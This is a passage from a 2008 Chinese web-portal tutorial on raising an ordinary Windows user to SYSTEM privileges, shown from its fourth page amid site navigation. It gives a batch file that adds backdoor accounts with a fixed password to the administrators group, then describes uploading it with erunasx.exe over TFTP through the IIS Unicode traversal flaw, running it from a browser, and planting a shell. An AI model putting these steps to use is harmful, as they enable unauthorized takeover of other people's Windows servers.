| 网站首页 | 易县新闻 | 易县图片 | 易县留言 | 易县在线 | 笑话 | 范文 | 教案 | 论文 | 考试 | 高校联盟 | 英语学习 | 法律 | 电脑网络 | 娱乐 | 两性频道 | 健康 | 求职创业 | 旅游 | 营销 | 疾病大全 | 汽车 | 
您现在的位置: 易县门户网 >> 电脑网络 >> 网络安全 >> 安全在线 >> 教程正文
Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法
作者:内详 来源:网络搜集 点击数: 更新时间:2008-3-31 18:11:14


"net localgroup administrators test /add"

 二.远程的主机
 1.如果想在远程的主机上通过普通的用户(test)拿到system权限的,可以结合一些漏洞比如:一些iis漏洞

  我们以unicode漏洞为例。

首先在本地构造一个构造一个bat文件名字为:boy.bat

net user test doudou /add-----------加个用户密码为:doudou
net localgroup administrators test /add ------ 添加到本地管理员组
net user boy doudou /add --------------再加一个用户密码为:doudou
net localgroup administrators boy /add --------同样添加到本地管理员组
我们做好这些之后,利用unicode漏洞tFTP上去erunasx.exe erunasx.dll 和上面描述的bat文件。
       易县门户网http://www.yxdoor.com    

       
至于你能否上传成功,那要看你自己了。

 上传成功之后然后想办法通过iis在web

浏览器运行命令erunasx.exe t.bat 然后就添加了我们在bat文件中制定的


test用户。经过流光的种植者测试上传了一个shell.exe。

现在unicode漏洞也好用了

上一页  [1] [2] [3] [4] 下一页

教程录入:yxdoor    责任编辑:yxdoor 
  • 上一篇教程:

  • 下一篇教程:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    赞 助 商 链 接
    特 别 推 荐
    相 关 文 章
    微软发布Win XP/Vista安全报告
    关闭无用服务保证Windows系统安
    如何解决G400、VIA和Win98/200
    电脑小绝技,Windows快捷键大全
    基于双核Linux工作站的Flame9.
    必备!Win XP系统安装经典技巧
    关于ThinkPad隐藏分区几个必知
    开机提示:Hareware Monitor fo
    接口(Interface)
    Wide Ultra SCSI
    最 新 热 门 资 讯
    普通教程打印机无法准确打印字体的解
    普通教程打开隐藏文件的方法
    普通教程暑期轻松刻录一夏——DVD刻
    普通教程“折磨”你的DVD——区码破
    普通教程主板系列知识:主板结构
    普通教程更换主板不用装系统的方法
    普通教程棘手问题帮你解 七大实例巧
    普通教程绝对意想不到 廉价板与高价
    普通教程主板系列知识:什么是FDD 插
    普通教程主板系列知识:适用平台